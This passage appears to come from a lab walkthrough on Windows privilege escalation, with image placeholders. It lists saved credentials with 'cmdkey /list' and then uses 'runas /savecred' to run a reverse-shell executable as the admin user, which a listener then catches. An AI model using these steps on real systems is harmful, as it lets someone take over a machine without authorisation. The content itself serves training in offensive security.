now we will escalate via saved creds on windows

cmdkey /list

Untitled

as we see we got the admin creds saved on the machine so let’s exploit it

runas /savecred /user:admin C:\\PrivEsc\\reverse.exe

Untitled

as we see it’s executed as admin user without asking for password so let’s go and check our listener

Untitled

as we see now we are the admin user on this machine